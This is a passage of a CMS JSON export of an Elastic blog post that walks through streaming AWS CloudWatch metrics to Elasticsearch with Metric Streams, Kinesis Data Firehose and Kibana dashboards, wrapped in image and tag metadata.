12pt;'\u003e\u003cstrong\u003eScalability:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Scale effortlessly, handling large volumes of data while providing low-latency querying.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Prerequisites","_metadata":{"uid":"cs1d3f7f777d91a4fa"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eBefore you begin, ensure that you have the following:\u003c/span\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eAWS account\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e:\u003c/strong\u003e A valid AWS account with appropriate IAM permissions\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eElastic cluster\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e: \u003c/strong\u003eSet up Elastic Cloud (Hosted or Serverless) on AWS (if not already done)\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eCloudWatch metrics\u003c/strong\u003e\u003c/span\u003e\u003cstrong\u003e\u003c/strong\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e: \u003c/strong\u003eEnsure you have CloudWatch metrics generated from your AWS resources\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eIAM roles/permissions\u003c/strong\u003e\u003c/span\u003e\u003cstrong\u003e\u003c/strong\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e:\u003c/strong\u003e Permissions to create and manage CloudWatch Metric Streams and write data to your Elasticsearch \u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e"},{"title_l10n":"Step-by-step guide to stream CloudWatch metrics to Elasticsearch","_metadata":{"uid":"cse454db17d7db0b36"},"header_style":"H2","paragraph_l10n":""},{"title_l10n":"Step 1: Set up an Elastic cluster","_metadata":{"uid":"csf0d77265c1a5261c"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIf you don’t have an existing Elastic cluster, create one:\u003c/span\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNavigate to the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAWS Marketplace and search for Elastic\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e in the AWS Management Console.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFollow the detailed steps outlined in this guide to deploy an Elastic cluster on AWS: \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/getting-started-with-elastic-cloud-on-amazon-web-services-aws\"\u003e\u003cspan style='font-size: 12pt;'\u003eGetting Started with Elastic Cloud on AWS\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSet up access policies and ensure the right permissions are in place for CloudWatch to push metrics to Elastic.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e"},{"title_l10n":"Step 2: Create a CloudWatch Metric Stream","_metadata":{"uid":"csd57f1e5aee768bb2"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eNow, let’s create a Metric Stream to send CloudWatch metrics to Elasticsearch.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e1. Go to the CloudWatch console:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOpen the \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eCloudWatch\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e dashboard in the AWS management console.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e2. Create Metric Stream:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIn the CloudWatch console, select \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eMetric Streams\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e from the navigation pane.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eClick on \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eCreate metric stream\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e3. Configure stream settings:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eChoose the metrics to stream, such as specific namespaces or all available metrics.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIn the \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eDestination\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e section, select \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eQuick Amazon Web Services Partner setup\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(22, 25, 31);font-size: 12pt;\"\u003e\u003cstrong\u003e \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eas the destination for the metrics stream.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs525e49440667dc23"}}},{"image":{"image":{"uid":"bltad972a8046fa5732","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-26T16:20:28.557Z","created_by":"bltb6c155cd84fc0c1a","file_size":"525749","filename":"image7.png","parent_uid":null,"tags":[],"title":"image7.png","updated_at":"2024-11-26T16:20:28.557Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-26T16:59:01.030Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltad972a8046fa5732/6745f54c434d823d9944f816/image7.png"},"_metadata":{"uid":"cs7d7fd66a21af868a"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs8c95bf08db9dbb2f"},"header_style":"H2","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eChoose \u003c/span\u003e\u003cspan style=\"color: rgb(22, 25, 31);font-size: 12pt;\"\u003e\u003cstrong\u003eElastic\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(22, 25, 31);font-size: 12pt;\"\u003e in the dropdown Amazon Web Services Partner destination and provide the Elastic endpoint URL and API key.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs8e6b1b7607fa9d09"}}},{"image":{"image":{"uid":"bltcf708eeccbc2ac24","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-26T16:20:59.509Z","created_by":"bltb6c155cd84fc0c1a","file_size":"335530","filename":"image5.png","parent_uid":null,"tags":[],"title":"image5.png","updated_at":"2024-11-26T16:20:59.509Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-26T16:59:00.970Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltcf708eeccbc2ac24/6745f56b35ea3e30dd1bdb82/image5.png"},"_metadata":{"uid":"cs308fb4ab6f2e14d9"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csc99aba52c32b9d4e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e4. Stream settings:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs07c73d7823361913"}}},{"image":{"image":{"uid":"blt82f1ff110d24b73c","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-26T16:21:29.067Z","created_by":"bltb6c155cd84fc0c1a","file_size":"392667","filename":"image1.png","parent_uid":null,"tags":[],"title":"image1.png","updated_at":"2024-11-26T16:21:29.067Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-26T16:59:01.103Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt82f1ff110d24b73c/6745f5894d7c430a9bf62208/image1.png"},"_metadata":{"uid":"csc74e3d82a972899f"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs9ff2d61982165eef"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e5. Review and create:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003eReview the configuration and click \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCreate metric stream\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs12b27a7364b684c0"}}},{"image":{"image":{"uid":"blt47a78eba366f8412","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-26T16:22:04.921Z","created_by":"bltb6c155cd84fc0c1a","file_size":"293700","filename":"image4.png","parent_uid":null,"tags":[],"title":"image4.png","updated_at":"2024-11-26T16:22:04.921Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-26T16:59:01.019Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt47a78eba366f8412/6745f5acd2a883f2f73e8704/image4.png"},"_metadata":{"uid":"cs4c925dc3f25bb176"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs739caebeb52ef80c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOnce the metric stream is created, CloudWatch will begin streaming the selected metrics to your Elastic Cloud instance in real time.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Step 3: Execute a Lambda function to generate CloudWatch metrics","_metadata":{"uid":"cs65fb01d7b94f9dd6"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eExecute an AWS Lambda function or run an EC2 compute instance that has your application code. You can now navigate to CloudWatch metrics to observe the current metrics being generated. For example, for AWS Lambda, you can see that the CloudWatch metrics are being generated, and here, you can see there are 130 invocations.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs198ffa625712cf40"}}},{"image":{"image":{"uid":"blt7dbc0baabfdcab89","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-26T16:22:48.827Z","created_by":"bltb6c155cd84fc0c1a","file_size":"124520","filename":"image6.png","parent_uid":null,"tags":[],"title":"image6.png","updated_at":"2024-11-26T16:22:48.827Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-26T16:59:00.955Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt7dbc0baabfdcab89/6745f5d8ef6d5a644c22758f/image6.png"},"_metadata":{"uid":"cs48fcf17ac026dda9"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Step 4: Verify data in Elastic","_metadata":{"uid":"cscf70f6c464133ad2"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAfter a few minutes, metrics should start appearing in your Elastic cluster. To verify:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eNavigate within Elastic to Kibana\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eNavigate to Elastic integrations\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOnce you're in Kibana, go to the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eManagement\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e section in the left-hand menu. Under \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eManagement,\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e click on \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eIntegrations\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSearch for Amazon Kinesis Data Firehose\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eIntegrations\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e section, use the search bar to find \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAmazon Kinesis Data Firehose.\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSelect the integration\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eClick on the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAmazon Kinesis Data Firehose\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e integration from the list.\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eGo to integration settings\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOnce you've clicked on the integration, navigate to the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSettings\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e section where you can configure the integration.\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eInstall necessary assets\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFollow the on-screen instructions to install any required assets for the integration.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cbr /\u003eIn Kibana, use the left-hand menu to select \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eManagement\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eThen, go to the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eIndex Management \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003esection and verify the name of your CloudWatch metrics stream under data streams.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eUse the left-hand menu to select \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eDashboards\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e under \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAnalytics\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e to create and view all the dashboards for your AWS usage. Search for “Metrics AWS” and select the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e[Metrics AWS] Usage Overview\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e dashboard.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs274eba7586c4565f"}}},{"image":{"image":{"uid":"blt94a67e37669abde4","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-26T16:25:00.300Z","created_by":"bltb6c155cd84fc0c1a","file_size":"329998","filename":"image2.png","parent_uid":null,"tags":[],"title":"image2.png","updated_at":"2024-11-26T16:25:00.300Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-26T16:59:01.043Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt94a67e37669abde4/6745f65c4b0ed13be1e1c683/image2.png"},"_metadata":{"uid":"csbfea193830e5b188"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs0131969743c7b3e5"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs you can see below, the same 130 invocations of the AWS Lambda function that you observed in the Amazon web console are streamed back into Elastic successfully.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs47d3dfe4e1b43475"}}},{"image":{"image":{"uid":"blt41e418c6cc2bb47d","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-26T16:25:28.843Z","created_by":"bltb6c155cd84fc0c1a","file_size":"220029","filename":"image3.png","parent_uid":null,"tags":[],"title":"image3.png","updated_at":"2024-11-26T16:25:28.843Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-26T16:59:01.007Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt41e418c6cc2bb47d/6745f67857ceff752ec93a6e/image3.png"},"_metadata":{"uid":"cs2357a85e88e48cd0"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csbaa6d56d0f6b7fbc"},"header_style":"H2","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eExplore the metrics\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOnce the index is created, you can query and visualize the data in Kibana.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eUse Kibana dashboards to create visualizations that combine CloudWatch metrics with logs or other data sources to gain better operational insights.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Step 5: Create dashboards and alerts","_metadata":{"uid":"csa96063c28876de57"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith your metrics now streaming to Elastic, you can:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eBuild custom dashboards\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e in Kibana for visual insights into your AWS environment’s health.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSet up alerts\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e for specific thresholds or anomalies detected in the data.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eUse the Elastic AI Assistant\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e to analyze alerts, such as high CPU usage in Amazon EC2 or Amazon Kubernetes Service (EKS) instances, to optimize and fine-tune your application workloads and to reduce costs.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Stream your metrics to Elastic","_metadata":{"uid":"cs929794944dc2ac06"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIntegrating Amazon CloudWatch Metric Streams with Elastic unlocks the potential for real-time analytics, better operational insights, and seamless monitoring of your AWS resources. By streaming CloudWatch metrics to Elasticsearch, you can use powerful querying and visualization features to optimize your infrastructure and applications. Whether you are looking to identify performance bottlenecks, track resource usage, or set up automated alerts, this integration provides the flexibility and scalability to meet your needs.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs874f485b9bbb90a1"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs9964c91edb251a6e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs4f7844799918964f"}}}],"publish_date":"2024-11-26","sanity_migration_complete":false,"seo":{"seo_title_l10n":"Stream AWS metrics to Elastic using Amazon CloudWatch Metric Streams","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt39140cf3e2cd4550","ACL":{},"created_at":"2023-11-06T21:51:00.583Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"integrations","label_l10n":"Integrations","tags":[],"title":"Integrations","updated_at":"2023-11-06T21:51:00.583Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.083Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt4ce45bbfeeff0638","ACL":{},"created_at":"2021-07-12T21:53:30.326Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"logs","label_l10n":"Logs","tags":[],"title":"Logs","updated_at":"2021-07-12T21:53:30.326Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:22.411Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[{"uid":"blt5b5a3dd3ee2ae4bd","_content_type_uid":"tags_partner"}],"tags_topic":[{"_content_type_uid":"tags_topic","title":"AWS","label_l10n":"AWS","keyword":"aws","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt5da20aee1a072f80","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:08:30.685Z","updated_at":"2023-11-06T20:08:30.685Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T10:00:52.463Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","title":"Cloud monitoring","label_l10n":"Cloud monitoring","keyword":"cloud-monitoring","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt4f82459203f5a666","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:35:08.968Z","updated_at":"2023-11-06T20:35:08.968Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:35.872Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltb1d5b7df835c3535","ACL":{},"created_at":"2023-11-06T21:38:33.456Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"continuous-monitoring","label_l10n":"Continuous monitoring","tags":[],"title":"Continuous monitoring","updated_at":"2023-11-06T21:38:33.456Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.388Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","uid":"bltf38f037a2b6ecb4e","title":"Log monitoring","label_l10n":"Log monitoring","keyword":"log-monitoring","hidden_value":false,"tags":[],"locale":"en-us","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T21:29:28.882Z","updated_at":"2023-11-06T21:29:28.882Z","ACL":{},"_version":1,"publish_details":{"time":"2023-11-09T17:49:08.371Z","user":"bltd2a3eb4e4d2bc159","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"title":"Monitoring","label_l10n":"Monitoring","keyword":"monitoring","hidden_value":true,"tags":[],"locale":"en-us","uid":"blt018d981515b9a4fd","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:39:24.931Z","updated_at":"2020-06-17T03:39:59.356Z","_content_type_uid":"tags_topic","ACL":{},"_version":2,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:39:24.931Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-07-02T18:15:31.077Z","user":"bltf6ab93733e4e3a73"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltb249a1eeba77b317","ACL":{},"created_at":"2020-06-17T03:31:53.522Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"apm","label_l10n":"APM","tags":[],"title":"APM","updated_at":"2020-07-06T22:20:22.552Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.550Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltbc86a233655f4b8e","ACL":{},"created_at":"2022-09-13T16:43:08.111Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2022-09-13T16:43:08.111Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.253Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid"